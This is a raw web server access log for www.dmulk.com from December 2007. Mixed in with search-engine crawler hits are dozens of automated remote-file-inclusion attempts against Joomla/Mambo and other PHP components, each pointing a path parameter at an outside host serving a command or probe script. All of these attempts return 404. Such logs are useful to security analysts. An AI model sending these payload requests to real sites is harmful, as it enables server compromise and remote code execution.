194.44.156.33 - - [20/Dec/2007:21:13:18 -0800] "GET /logs/content.php?seite=http://theowns-host.we.bs/files/nerv-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.155 - - [20/Dec/2007:21:19:13 -0800] "GET /logs/access_071019.log HTTP/1.0" 200 78488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.247.71.13 - - [20/Dec/2007:21:19:51 -0800] "GET /content.php?seite=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.32.94.50 - - [20/Dec/2007:21:22:41 -0800] "GET /content.php?seite=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:21:24:35 -0800] "GET /retreat1/?N=D HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.247.71.13 - - [20/Dec/2007:21:27:32 -0800] "GET /logs/access_071127.log/content.php?seite=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [20/Dec/2007:21:27:32 -0800] "GET /logs/content.php?seite=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.32.94.50 - - [20/Dec/2007:21:30:00 -0800] "GET /logs/access_071127.log/content.php?seite=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [20/Dec/2007:21:30:01 -0800] "GET /logs/content.php?seite=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:36:58 -0800] "GET /logs/access_071110.log///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:36:58 -0800] "GET ///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:36:58 -0800] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.infoliquid.com/zen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:21:38:11 -0800] "GET /retreat1/?M=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:54:08 -0800] "GET /logs/access_071110.log///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:54:08 -0800] "GET ///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:54:08 -0800] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.236 - - [20/Dec/2007:21:58:10 -0800] "GET /megumi/Necklace/?M=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:21:58:14 -0800] "GET ///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:21:59:14 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [20/Dec/2007:22:00:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [20/Dec/2007:22:00:04 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.85.175.42 - - [20/Dec/2007:22:00:18 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.175.42 - - [20/Dec/2007:22:00:18 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.175.42 - - [20/Dec/2007:22:00:18 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:22:06:38 -0800] "GET /logs/access_071110.log///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [20/Dec/2007:22:06:39 -0800] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.73.36 - - [20/Dec/2007:22:09:17 -0800] "HEAD /bikes/dteel/MVI_2430.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [20/Dec/2007:22:09:17 -0800] "HEAD /bikes/dteel/MVI_2434.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [20/Dec/2007:22:09:17 -0800] "HEAD /funny/terryt1.wmv HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
216.70.112.3 - - [20/Dec/2007:22:17:24 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://web70.bces-1500.de/phpBB2/install_old/install? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [20/Dec/2007:22:17:24 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://web70.bces-1500.de/phpBB2/install_old/install? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.112.3 - - [20/Dec/2007:22:17:25 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://web70.bces-1500.de/phpBB2/install_old/install? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.19.160.1 - - [20/Dec/2007:22:18:39 -0800] "GET /logs/access_071110.log///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.19.160.1 - - [20/Dec/2007:22:18:39 -0800] "GET ///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.19.160.1 - - [20/Dec/2007:22:18:40 -0800] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://tanbebek.com/pitik/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.231.50 - - [20/Dec/2007:22:19:14 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.turnkey-innovations.net/allinone/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.199.231.50 - - [20/Dec/2007:22:19:14 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.turnkey-innovations.net/allinone/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:25:06 -0800] "GET /content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.43 - - [20/Dec/2007:22:36:42 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.73 - - [20/Dec/2007:22:36:49 -0800] "GET /logs/access_070909.log HTTP/1.0" 200 75478 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.216 - - [20/Dec/2007:22:38:50 -0800] "GET /logs/access_071025.log HTTP/1.0" 200 25205 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:40:58 -0800] "GET /logs/access_071110.log/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:40:58 -0800] "GET /logs/content/multithumb?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:41:18 -0800] "GET /modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:22:41:24 -0800] "GET /megumi/Bracelet/ HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.158 - - [20/Dec/2007:22:51:28 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:56:32 -0800] "GET /logs/access_071203.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:56:33 -0800] "GET /logs/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:57:42 -0800] "GET /logs/access_071129.log/modules/repository/singlefile.php?cid=94&lid=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:22:59:01 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.42.119 - - [20/Dec/2007:23:01:15 -0800] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.186.42.119 - - [20/Dec/2007:23:01:15 -0800] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.186.42.119 - - [20/Dec/2007:23:04:04 -0800] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.186.42.119 - - [20/Dec/2007:23:04:04 -0800] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:06:48 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:06:49 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:06:49 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:23:13:50 -0800] "GET /logs/access_071129.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:23:13:51 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:14:21 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:14:21 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:14:21 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.119.200.212 - - [20/Dec/2007:23:15:32 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.71.9.25 - - [20/Dec/2007:23:18:44 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://blackswords.us/sword/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [20/Dec/2007:23:18:44 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://blackswords.us/sword/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:19:22 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:19:22 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:19:23 -0800] "GET /convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:19:23 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:19:23 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [20/Dec/2007:23:19:23 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.71.9.25 - - [20/Dec/2007:23:21:54 -0800] "GET /logs/access_071016.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://blackswords.us/sword/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [20/Dec/2007:23:21:56 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://blackswords.us/sword/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [20/Dec/2007:23:21:56 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://blackswords.us/sword/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.71.9.25 - - [20/Dec/2007:23:21:57 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://blackswords.us/sword/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:27:36 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:27:36 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:27:37 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:27:40 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:27:40 -0800] "GET /convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [20/Dec/2007:23:27:41 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:29:44 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:29:44 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:29:45 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.212.250 - - [20/Dec/2007:23:35:10 -0800] "GET /convert/mvcw.php?vwar_root=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
209.97.212.250 - - [20/Dec/2007:23:35:10 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.128.133.119 - - [20/Dec/2007:23:35:42 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
62.128.133.119 - - [20/Dec/2007:23:35:42 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
62.128.133.119 - - [20/Dec/2007:23:35:48 -0800] "GET /convert/mvcw.php?vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
62.128.133.119 - - [20/Dec/2007:23:35:49 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test_0.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
62.128.133.119 - - [20/Dec/2007:23:35:52 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.128.133.119 - - [20/Dec/2007:23:35:57 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://armageddon0683.zoomshare.com/files/file_injek/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:47:12 -0800] "GET /logs/access_071129.log/convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:47:13 -0800] "GET /convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:47:13 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.145 - - [20/Dec/2007:23:49:02 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.170 - - [20/Dec/2007:23:51:23 -0800] "GET /tmp/sess_f6e3039f64398e069bcbb327236aa12b HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.159 - - [20/Dec/2007:23:54:10 -0800] "GET /retreat1/?D=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.38 - - [20/Dec/2007:23:55:11 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1488 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.232 - - [20/Dec/2007:23:55:19 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:55:38 -0800] "GET /logs/access_071129.log/convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:55:38 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [20/Dec/2007:23:55:39 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://gw-gold.net/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.115 - - [21/Dec/2007:00:01:33 -0800] "GET /logs/access_070914.log HTTP/1.0" 200 86919 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.225 - - [21/Dec/2007:00:02:38 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.12 - - [21/Dec/2007:00:14:00 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 26799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.159 - - [21/Dec/2007:00:27:48 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
74.6.26.137 - - [21/Dec/2007:00:41:09 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.159 - - [21/Dec/2007:00:42:37 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.45 - - [21/Dec/2007:00:52:35 -0800] "GET /tmp/sess_5411016a3b8167fd9b6c2459e7db9458 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.219 - - [21/Dec/2007:01:10:27 -0800] "GET /tmp/sess_f325b43e0daf976658ce1dcb0a44f199 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.39.110 - - [21/Dec/2007:01:11:03 -0800] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
